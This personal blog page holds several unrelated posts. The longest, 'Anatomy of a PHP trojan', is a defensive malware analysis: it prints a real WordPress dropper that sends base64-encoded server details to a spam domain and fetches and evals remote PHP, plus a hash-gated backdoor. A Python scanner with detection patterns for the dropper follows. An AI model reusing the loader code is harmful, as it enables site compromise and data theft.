
This page intentionally left ugly

A programmer and technology enthusiast destroys programming and technology. Welcome to the dichotomy of my existence...

Feel free to browse the experiments and pick up anything you may find useful. Or head over to the obligatory introduction.

WARNING: I post a lot of code on this blog and some of it gets mangled by WordPress formatting. Please double-check for missing or extra quotes, backslashes, '<' and '>' transformed into '&lt;' and '&gt;' and other problems. All the code posted here has been verified to work before I post, except in cases where I explicitly mention that it's incomplete.

Damn you, brain! Why can’t YOU run spellcheck?!

January 27, 2012

I just came back from a late night coffee run and decided to sit down to work a little on my discussion forum before going to bed (I need coffee to sleep… don’t ask).

It was all fine and dandy until I decided to add a little spellcheck option to the input form. Not expecting that many people will use it since this is also meant to be mobile friendly so a lot of posts will likewise be txtspeak gibberish, but I thought it would be nice to have the feature anyway.

Let me preface this by saying that I have never been good at spelling, or even OK at spelling for that matter. I was even rubbish at spelling in Sinhalese when I was a little kid, so this isn’t just an English thing. I don’t know if it’s some undiagnosed form of dyslexia or maybe I’m typing faster than the throughput of my cerebral plumbing or vice versa; either way, I just can’t spell.

So when I started writing the spellcheck functionality, I thought it was a simple, straightforward affair. A dictionary source, a backend response generator and some client-side jQuery witchcraft to make this work without any added burden to the UI.

The burden, it turns out, was to my prefrontal cortex.

E.g. this was meant to be just a simpler version of the spellcheck plugin which comes with TinyMCE. I wasn’t using an IDE for the JS side of this, so I figured I’d be fine with just Notepad.

What’s wrong with this?

(function() {
	tinymce.create('tinymce.plugins.SpelchekcPlugin', {
		inti : function(ed, url) {
			// Some stuff will happen here
		},
		createControl : function(n, cm) {
			return null;
		},
		getInfo : function() {
			return {
				longname: 'Spellcheck Plugin',
				author : 'eksith'
			};
		}
	});
});

Sometimes, I feel like a construction worker who’s always safe with equipment, always wears a helmet, always on time and always forgets his pants.

Anatomy of a PHP trojan

January 25, 2012

A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident of another friend’s website. The backend was compromised with no apparent user involvement which means another site on the same server possibly served as the backdoor or perhaps the server admins didn’t set the permissions correctly.

A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the uploading privileges which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since they had sandboxed access.

Certain WordPress plugins require an inordinate amount of privileges, which is the one big reason to run a site with the minimum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or allow arbitrary writing and uploading privileges when the bare minimum is acceptable.

The following is a file called 189715.php found in the /wp-uploads folder of this website; the same code was found in other areas under different numeric filenames. This was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted:

<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>

<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?" .
	base64_encode($a). "." .
	base64_encode($b) . "." .
	base64_encode($c) . "." .
	base64_encode($d) . "." .
	base64_encode($e) . "." .
	base64_encode($f) . "." .
	base64_encode($g) . "." .
	base64_encode($h) . ".e." .
	base64_encode($i) . "." .
	base64_encode($j);

$f=base64_decode("cGhwc2VhcmNoLmNu");

if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
	md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
	$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else{
		$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
};
die(); ?>

Variable $z is basically a query string that packs all of the relevant server and environment data gathered into the previously defined variables, each value base64-encoded and joined with dots, so it is sent along to the remote host with every fetch.

The string “cGhwc2VhcmNoLmNu” assigned to the $f variable decodes to “phpsearch.cn”, this particular spammer’s domain. “aHR0cDovL2FkczMu” decodes to the subdomain prefix “http://ads3.”, meaning this was a domain intended to inject spam, and I’m sure the domain itself was expendable. “aHR0cDovLzcxLg==” points to the subdomain prefix “http://71.” while “aHR0cDovLzcu” is “http://7.”.

That include block was meant to fetch another PHP file from the remote host and run it locally, trying three methods in turn: a remote include() (which executes the fetched file directly), then file_get_contents() followed by eval() if the include failed, and finally curl followed by eval() if that failed too.

Note also the small backdoor just above it: if the request carries a “q” parameter whose md5 matches the hard-coded hash, $f is replaced with whatever is in the “id” parameter, so the operator can point the loader at any host they like without touching the file again.

The [BASE64 ENCODED STRING] was actually another encoded function:

if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
	$GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
	if(file_exists($GLOBALS['mfsn'])){
			include_once($GLOBALS['mfsn']);
			if(function_exists('gml') && function_exists('dgobh'))
			{ob_start('dgobh');}
		}
}

The [REDACTED ROOT] is of course the WP installation directory on this server, and in this case the compromised plugin was OpenID.

The Auth/OpenID directory was full of junk that was surreptitiously uploaded as well. Also, the content of style.css.php was another massive block of base64 encoded code (which I was unable to decode), and the “mfsn” variable held the location of another file that was meant to be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but I can guess that they included everything from more injection code to spam to even drive-by downloads.

After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.

PHP trojans often employ base64 encoding, and sometimes split the encoded string into several pieces that are only concatenated back together before decoding and eval(). This makes the code harder to spot, and harder still to work out what it actually does, especially in a big file skimmed with just a cursory glance.
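The following is an added example written for this post, not code from the post or from any scanner product. It is a small Python script that flags the obfuscation tricks shown in the sample above (error reporting silenced, eval() around base64_decode() or a variable, include()/file_get_contents()/curl_init() fed a base64-built URL, a base64 literal split into concatenated pieces, and an ob_start() callback), decodes every base64 literal it finds so hostname prefixes like the ones decoded above become visible, and decodes a beacon path of the shape $z builds so you can see exactly which server variables leave the box. The SAMPLE_PHP string, the env dict, the indicator names and all helper functions are my own constructions; the hostname literals are the ones from the post.

```python
import base64
import re
from pathlib import Path

# Obfuscation tricks used by the sample above: error reporting silenced, eval()
# wrapped around base64_decode() or a variable, include()/file_get_contents()/
# curl_init() fed a base64-built URL, a base64 literal split into concatenated
# pieces, and an ob_start() callback like the one the style.css.php loader set.
INDICATORS = {
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "eval_of_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "eval_of_variable": re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
    "remote_fetch_of_base64_url": re.compile(
        r"\b(?:include|include_once|require|require_once|file_get_contents|curl_init)"
        r"\s*\(\s*base64_decode\s*\("),
    "split_base64_literal": re.compile(
        r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]+['\"]"
        r"(?:\s*\.\s*['\"][A-Za-z0-9+/=]+['\"])+\s*\)"),
    "ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"]\w+['\"]\s*\)"),
}

# One or more quoted base64 literals (possibly '.'-concatenated) passed to base64_decode().
BASE64_ARG = re.compile(
    r"base64_decode\s*\(\s*((?:['\"][A-Za-z0-9+/=]+['\"]\s*\.?\s*)+)\)")
QUOTED = re.compile(r"['\"]([A-Za-z0-9+/=]+)['\"]")

# Order of the fields packed into $z by the sample; the bare "e" between
# REMOTE_ADDR and SCRIPT_FILENAME is a literal marker, not data.
BEACON_FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
                 "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR",
                 "e", "SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE"]


def decode_literal(literal):
    """Decode one base64 literal to text; None if it is not valid base64 or not UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_php(source):
    """Return which indicators fire in a PHP source string plus every decoded base64 argument."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(source)]
    decoded = {}
    for match in BASE64_ARG.finditer(source):
        # Re-join split literals ('aaaa'.'bbbb') first, exactly as PHP would at runtime.
        joined = "".join(QUOTED.findall(match.group(1)))
        decoded[joined] = decode_literal(joined)
    return {"indicators": hits, "decoded": decoded}


def scan_directory(root):
    """Scan every *.php file under root (e.g. wp-content/uploads, where no PHP belongs at all)."""
    reports = {}
    for path in Path(root).rglob("*.php"):
        report = scan_php(path.read_text(errors="replace"))
        if report["indicators"]:
            reports[str(path)] = report
    return reports


def build_beacon(env):
    """Rebuild the $z string the sample sends, from a dict of $_SERVER values (constructed Python port)."""
    parts = ["e" if f == "e" else base64.b64encode(env.get(f, "").encode()).decode()
             for f in BEACON_FIELDS]
    return "/?" + ".".join(parts)


def decode_beacon(query):
    """Recover the server variables leaked in a captured beacon path, e.g. from an outbound proxy log."""
    if not query.startswith("/?"):
        raise ValueError("not a beacon path")
    parts = query[2:].split(".")  # "." never appears in base64, so splitting on it is safe
    return {f: base64.b64decode(p).decode("utf-8", errors="replace")
            for f, p in zip(BEACON_FIELDS, parts) if f != "e"}


# Constructed sample shaped like the dropper above: the hostname literals are the
# ones decoded in the post, the eval()ed payload is a harmless placeholder.
SAMPLE_PHP = r"""<?php /**/eval(base64_decode('ZWNobyAi'.'aGkiOw==')); ?>
<?
error_reporting(0);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
    eval($c);
ob_start('dgobh');
"""

if __name__ == "__main__":
    report = scan_php(SAMPLE_PHP)
    print("indicators:", ", ".join(report["indicators"]))
    for literal, text in report["decoded"].items():
        print(f"  {literal} -> {text!r}")
    leaked = decode_beacon(build_beacon({"HTTP_HOST": "example.test", "REMOTE_ADDR": "203.0.113.5"}))
    print("beacon leaks:", {k: v for k, v in leaked.items() if v})
```

Running scan_directory() against an uploads folder is the useful mode: any .php file there is already a finding, and the indicator list tells you at a glance whether it is the dropper shape above. The beacon decoder is for the other side of the incident, reading the outbound request your proxy or web server logged and seeing which host names, paths and client addresses were handed to the spammer.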

Site of the Week: Pantheism.net

January 24, 2012

I’ve been fascinated with the Pantheism movement for a very long time and this is probably the closest modern, spiritually prefaced, interpretation of the age old idea of not [pooping] where you eat. I.e. live and let live, responsibly. Pantheism.net is a good resource for people just starting to learn the details.

Are you searching for a path which focuses on Earth in the Cosmos, rather than some imaginary beyond? Are you more concerned with saving the planet than saving your eternal soul?
Do you hunger for a spirituality that respects individual choice rather than pushing prejudice down people's throats, and that values reason rather than fanaticism?
Do you find it impossible to believe in supernatural beings, and difficult to conceive of anything more worthy of the deepest respect than the beauty of Nature or the power and mystery of the Universe?
Do you feel a deep sense of peace and belonging and wonder in the midst of Nature?
If you answered yes to these questions, then you will feel at home in the World Pantheist Movement.

Whole Earth Catalog: A roadmap to humanity

January 23, 2012

I found this volume at a tag sale some years ago and thought it was just a curiosity at the time. I bought it for a few dollars and took it home only to forget about it until recently (moving does that to you sometimes).

After getting another chance to go over everything I’ve been missing, I have to say… This is by far one of the best resources on simple living, sustainability and even our own peculiarities (I.E. there is no censorship). The Whole Earth Catalog should be in everyone’s library. If anything it can really open some eyes that are sewn shut with self-centeredness these days.

It’s one of the more revolutionary publications that will sorely be missed today.

Subtitling this "Access to Tools" has to be one of the biggest understatements in publishing. It's oh-so-much-more

 

The catalog is a year older than me! And it really does cover the Whole Earth!

Published October 1981

 

The map has changed a bit since this edition, but the topics it covers, vast in breadth and depth, go from “Understanding Whole Systems”, which includes Laws of form, Space, Eco-ethics, Evolution, Natural history and Plants, to “Community”, which includes Recycling, Rural emergency, Home nursing, Women’s health, Childbirth (in graphic detail), Sex (also in “detail” of sorts), Consumer reports and everything in between. It’s a who’s who and what’s what of basic and enhanced living.

The list of topics covered is copious as it is astoundingly fascinating.

 

While browsing through this time, I came across an article on Sri Lanka! Specifically the concept of “Shramadana”, which is a contraction of the Sarvodaya Shramadana Movement in Sri Lanka. The article goes into a specific example at work; however, considering this was published before the civil war, I don’t know how many of these people are still around. Hopefully many. Their example will be one of the few things that will keep the country going.

"It does not require oil, gas coal or nukes; it empowers people not machines; it is shramadana. Literally meaning the giving (dana) of human energy (shrama)"

 

The concept can best be summarized as using human equity toward completing projects for the community. Anyone can grab a tool and participate provided you’re of able body and sound mind. It doesn’t matter what your social status is; a banker and farmer are equals in terms of what they can contribute in human energy.

Habitat for Humanity is probably the closest Western counterpart

 

What really got me interested are the aspects of environmental consciousness and the examples of “better” and “wiser” living that we could really use right now. It really drives home how far ahead of its time this was, as only now are we starting to understand the consequences of our actions.

"The Man Who Planted Trees and Grew Happiness" - Brilliant!

 

Then there are the creative aspects of what we can actually do about this. The sustainability pointers in this are, I think, invaluable today more than ever.

Building a house using telephone poles as raw material. How creative is that?

 

The book is full of examples like these for simple, sustainable living as well as creative solutions to real world problems that are oddly still applicable by and large today.

Then there are also aspects of humanity that some of us still wouldn’t dare discuss openly or honestly. It’s an amazing testament to how much popular publications censor themselves on real issues while advancing pointless topics. Talk about being hypocritical prudes.

I had to cover the naughty bits. This being a family-friendly blog and all ;)

 

Did I mention there’s no censorship in this book? Can you imagine a popular publication making mention of something like this today?

And that, boys and girls, is why I keep thinking I was born a few decades too late.

Discussion Forum mockup

January 22, 2012

I love Sundays. Not just because there’s no post on Sundays as Vernon Dursley from Harry Potter would infer, but it’s because I get to sleep late some days.

This morning, I put together a quick HTML mockup of the original front page sketch of the discussion forum I talked about a few days ago. All in all, I’m pretty satisfied at how close it came to the Photoshop version and, aside from a few rough edges, I think it accomplishes pretty much everything I want in a “Home” page.

Now I just need to put together the “Tag” page where users can browse all posts under that tag (pretty similar to the “Author” page where users can see all posts under a particular user) and something like a very simple dashboard for the “My Account” page where users can keep track of their subscriptions.

I think it’s best to keep everything organized via feeds for this. If all subscriptions are done in RSS, I think it would be easier for mobile users as well.

I’ll make any changes to the HTML layout on the mockup and start the backend work soon.